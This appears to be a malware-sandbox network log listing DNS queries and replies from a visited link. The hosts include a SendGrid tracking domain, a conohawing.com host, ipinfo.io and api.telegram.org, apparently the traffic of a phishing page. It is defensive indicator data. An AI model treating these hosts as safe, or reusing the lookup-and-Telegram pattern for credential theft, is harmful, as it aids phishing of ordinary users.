                                                                                                                                          Nov 28, 2024 11:32:04.949786901 CET5699753192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:04.949934006 CET6287953192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:05.087479115 CET53569971.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:05.087651014 CET53628791.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.225758076 CET6392053192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:07.226058960 CET5095653192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:07.450074911 CET53509561.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:07.455987930 CET53639201.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:09.591190100 CET6257553192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:09.591329098 CET6403053192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:10.443898916 CET53625751.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:10.444674969 CET53640301.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:12.926474094 CET5743253192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:12.926645994 CET4948953192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:12.927793980 CET5341953192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:12.927936077 CET5052053192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:13.068948984 CET53574321.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.069334030 CET53504451.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.070857048 CET53494891.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.071445942 CET53545831.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.072012901 CET53505201.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.859570980 CET5252653192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:13.859694004 CET5536753192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:13.860059023 CET5077353192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:13.860193014 CET4942653192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:13.860593081 CET5154153192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:13.860887051 CET5342553192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:13.997076035 CET53553671.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.997967005 CET53534251.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.998393059 CET53494261.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.998409986 CET53525261.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.999003887 CET53507731.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.001193047 CET53515411.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.238637924 CET5060353192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:15.238853931 CET6321153192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:15.378156900 CET53632111.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.378371000 CET53506031.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.908241034 CET5515153192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:15.908370972 CET6148753192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.045918941 CET53614871.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.045994997 CET53551511.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.123189926 CET5374453192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.123189926 CET5344153192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.162108898 CET53519451.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.207983017 CET6390653192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.208220959 CET6211153192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.215058088 CET5136853192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.215058088 CET4979453192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.235353947 CET5886953192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.235353947 CET5436253192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.261069059 CET53537441.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.263118029 CET53534411.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.347713947 CET53621111.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.356251955 CET53639061.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.357891083 CET53497941.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.359040976 CET53513681.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.372431040 CET53580851.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.372459888 CET53543621.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.372634888 CET53588691.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:16.986926079 CET5009553192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.986926079 CET5641953192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.988800049 CET6114453192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:16.988800049 CET5840853192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:17.631931067 CET53564191.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:17.634588003 CET53500951.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:18.174326897 CET5917753192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:18.174642086 CET6533053192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:18.471026897 CET53591771.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:18.471074104 CET53653301.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:18.501261950 CET138138192.168.2.4192.168.2.255
                                                                                                                                          Nov 28, 2024 11:32:19.426841021 CET5108853192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:19.426975012 CET5268753192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:19.564369917 CET53510881.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.568207979 CET53526871.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.217051983 CET5119153192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:20.217313051 CET6364153192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:20.219376087 CET5818453192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:20.219506025 CET5826853192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:20.354350090 CET53511911.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.355323076 CET53636411.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.357285023 CET53582681.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.357542992 CET53581841.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.620271921 CET53609111.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.307545900 CET5254153192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:22.311405897 CET6543753192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:22.377229929 CET5125753192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:22.381443024 CET5555053192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:22.445626974 CET53525411.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.449132919 CET53654371.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.515796900 CET53512571.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.618573904 CET53555501.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:24.665338039 CET5081253192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:24.665721893 CET6459053192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:24.802498102 CET53508121.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:24.804666996 CET53645901.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:40.524935961 CET53609171.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:42.021615982 CET5664553192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:42.021764040 CET5589553192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:42.449820995 CET53566451.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:42.450472116 CET53558951.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:43.867243052 CET5340353192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:43.867300987 CET5137153192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:44.007745981 CET53513711.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:44.008064032 CET53534031.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:54.706378937 CET5360653192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:54.706515074 CET6153953192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:54.845139980 CET53536061.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:54.845175028 CET53615391.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:57.737775087 CET5253853192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:57.737919092 CET6361553192.168.2.41.1.1.1
                                                                                                                                          Nov 28, 2024 11:32:58.130738974 CET53636151.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:58.131026030 CET53525381.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:01.098022938 CET53532611.1.1.1192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:02.994504929 CET53631301.1.1.1192.168.2.4
                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                          Nov 28, 2024 11:32:22.618648052 CET192.168.2.41.1.1.1c235(Port unreachable)Destination Unreachable
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Nov 28, 2024 11:32:04.949786901 CET192.168.2.41.1.1.10xc8adStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:04.949934006 CET192.168.2.41.1.1.10x2b44Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:07.225758076 CET192.168.2.41.1.1.10xcf9eStandard query (0)u48396839.ct.sendgrid.netA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:07.226058960 CET192.168.2.41.1.1.10xeeb6Standard query (0)u48396839.ct.sendgrid.net65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:09.591190100 CET192.168.2.41.1.1.10xc2e9Standard query (0)igacorp.conohawing.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:09.591329098 CET192.168.2.41.1.1.10x5d92Standard query (0)igacorp.conohawing.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:12.926474094 CET192.168.2.41.1.1.10xf93bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:12.926645994 CET192.168.2.41.1.1.10x11dStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:12.927793980 CET192.168.2.41.1.1.10xc37aStandard query (0)kit.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:12.927936077 CET192.168.2.41.1.1.10xc3b2Standard query (0)kit.fontawesome.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.859570980 CET192.168.2.41.1.1.10x6283Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.859694004 CET192.168.2.41.1.1.10xdfffStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.860059023 CET192.168.2.41.1.1.10x983bStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.860193014 CET192.168.2.41.1.1.10xdee4Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.860593081 CET192.168.2.41.1.1.10x10a8Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.860887051 CET192.168.2.41.1.1.10xa116Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:15.238637924 CET192.168.2.41.1.1.10xb67eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:15.238853931 CET192.168.2.41.1.1.10xe63fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:15.908241034 CET192.168.2.41.1.1.10xaf03Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:15.908370972 CET192.168.2.41.1.1.10xb1daStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.123189926 CET192.168.2.41.1.1.10x4ad5Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.123189926 CET192.168.2.41.1.1.10xad5aStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.207983017 CET192.168.2.41.1.1.10xe750Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.208220959 CET192.168.2.41.1.1.10x4c25Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.215058088 CET192.168.2.41.1.1.10x3fdaStandard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.215058088 CET192.168.2.41.1.1.10xee44Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.235353947 CET192.168.2.41.1.1.10x634aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.235353947 CET192.168.2.41.1.1.10xddc0Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.986926079 CET192.168.2.41.1.1.10x531cStandard query (0)image.thum.ioA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.986926079 CET192.168.2.41.1.1.10x4a3aStandard query (0)image.thum.io65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.988800049 CET192.168.2.41.1.1.10xd8c6Standard query (0)ka-f.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.988800049 CET192.168.2.41.1.1.10x4f81Standard query (0)ka-f.fontawesome.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:18.174326897 CET192.168.2.41.1.1.10xc620Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:18.174642086 CET192.168.2.41.1.1.10xaa4Standard query (0)ipinfo.io65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:19.426841021 CET192.168.2.41.1.1.10xe0d2Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:19.426975012 CET192.168.2.41.1.1.10xea4bStandard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:20.217051983 CET192.168.2.41.1.1.10x44c6Standard query (0)dns.googleA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:20.217313051 CET192.168.2.41.1.1.10x6b8cStandard query (0)dns.google65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:20.219376087 CET192.168.2.41.1.1.10xe3e3Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:20.219506025 CET192.168.2.41.1.1.10x3849Standard query (0)ipinfo.io65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:22.307545900 CET192.168.2.41.1.1.10xd16dStandard query (0)dns.googleA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:22.311405897 CET192.168.2.41.1.1.10x35a4Standard query (0)dns.google65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:22.377229929 CET192.168.2.41.1.1.10xfd22Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:22.381443024 CET192.168.2.41.1.1.10x9c44Standard query (0)api.telegram.org65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:24.665338039 CET192.168.2.41.1.1.10xde80Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:24.665721893 CET192.168.2.41.1.1.10xa6c0Standard query (0)api.telegram.org65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:42.021615982 CET192.168.2.41.1.1.10xc5e5Standard query (0)www.agriparadigma.itA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:42.021764040 CET192.168.2.41.1.1.10xae42Standard query (0)www.agriparadigma.it65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:43.867243052 CET192.168.2.41.1.1.10xd18aStandard query (0)www.agriparadigma.itA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:43.867300987 CET192.168.2.41.1.1.10x8295Standard query (0)www.agriparadigma.it65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:54.706378937 CET192.168.2.41.1.1.10x5e70Standard query (0)www.agriparadigma.itA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:54.706515074 CET192.168.2.41.1.1.10x2c9Standard query (0)www.agriparadigma.it65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:57.737775087 CET192.168.2.41.1.1.10xb4a1Standard query (0)www.tentamus.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:57.737919092 CET192.168.2.41.1.1.10x8a33Standard query (0)www.tentamus.com65IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Nov 28, 2024 11:32:05.087479115 CET1.1.1.1192.168.2.40xc8adNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:05.087651014 CET1.1.1.1192.168.2.40x2b44No error (0)www.google.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:10.443898916 CET1.1.1.1192.168.2.40xc2e9No error (0)igacorp.conohawing.com118.27.122.26A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.068948984 CET1.1.1.1192.168.2.40xf93bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.068948984 CET1.1.1.1192.168.2.40xf93bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.068948984 CET1.1.1.1192.168.2.40xf93bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.068948984 CET1.1.1.1192.168.2.40xf93bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.071238995 CET1.1.1.1192.168.2.40xc37aNo error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.072012901 CET1.1.1.1192.168.2.40xc3b2No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.997076035 CET1.1.1.1192.168.2.40xdfffNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.997967005 CET1.1.1.1192.168.2.40xa116No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.998393059 CET1.1.1.1192.168.2.40xdee4No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.998409986 CET1.1.1.1192.168.2.40x6283No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.998409986 CET1.1.1.1192.168.2.40x6283No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.999003887 CET1.1.1.1192.168.2.40x983bNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:13.999003887 CET1.1.1.1192.168.2.40x983bNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:14.001193047 CET1.1.1.1192.168.2.40x10a8No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:14.001193047 CET1.1.1.1192.168.2.40x10a8No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:15.378371000 CET1.1.1.1192.168.2.40xb67eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:15.378371000 CET1.1.1.1192.168.2.40xb67eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:15.378371000 CET1.1.1.1192.168.2.40xb67eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:15.378371000 CET1.1.1.1192.168.2.40xb67eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.045918941 CET1.1.1.1192.168.2.40xb1daNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.045994997 CET1.1.1.1192.168.2.40xaf03No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.045994997 CET1.1.1.1192.168.2.40xaf03No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.261069059 CET1.1.1.1192.168.2.40x4ad5No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.261069059 CET1.1.1.1192.168.2.40x4ad5No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.263118029 CET1.1.1.1192.168.2.40xad5aNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.347713947 CET1.1.1.1192.168.2.40x4c25No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.356251955 CET1.1.1.1192.168.2.40xe750No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.356251955 CET1.1.1.1192.168.2.40xe750No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.357891083 CET1.1.1.1192.168.2.40xee44No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.357891083 CET1.1.1.1192.168.2.40xee44No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.357891083 CET1.1.1.1192.168.2.40xee44No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.357891083 CET1.1.1.1192.168.2.40xee44No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.357891083 CET1.1.1.1192.168.2.40xee44No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.359040976 CET1.1.1.1192.168.2.40x3fdaNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.372459888 CET1.1.1.1192.168.2.40xddc0No error (0)www.google.com65IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:16.372634888 CET1.1.1.1192.168.2.40x634aNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:17.126132965 CET1.1.1.1192.168.2.40xd8c6No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:17.128765106 CET1.1.1.1192.168.2.40x4f81No error (0)ka-f.fontawesome.comka-f.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:17.634588003 CET1.1.1.1192.168.2.40x531cNo error (0)image.thum.io54.226.114.88A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:17.634588003 CET1.1.1.1192.168.2.40x531cNo error (0)image.thum.io34.202.133.228A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:17.634588003 CET1.1.1.1192.168.2.40x531cNo error (0)image.thum.io54.174.1.1A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:18.471026897 CET1.1.1.1192.168.2.40xc620No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:19.564369917 CET1.1.1.1192.168.2.40xe0d2No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:19.564369917 CET1.1.1.1192.168.2.40xe0d2No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:19.564369917 CET1.1.1.1192.168.2.40xe0d2No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:19.564369917 CET1.1.1.1192.168.2.40xe0d2No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:19.564369917 CET1.1.1.1192.168.2.40xe0d2No error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:19.568207979 CET1.1.1.1192.168.2.40xea4bNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:20.354350090 CET1.1.1.1192.168.2.40x44c6No error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:20.354350090 CET1.1.1.1192.168.2.40x44c6No error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:20.357542992 CET1.1.1.1192.168.2.40xe3e3No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:22.445626974 CET1.1.1.1192.168.2.40xd16dNo error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:22.445626974 CET1.1.1.1192.168.2.40xd16dNo error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                                                                                                                          Nov 28, 2024 11:32:22.515796900 CET1.1.1.1192.168.2.40xfd22No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
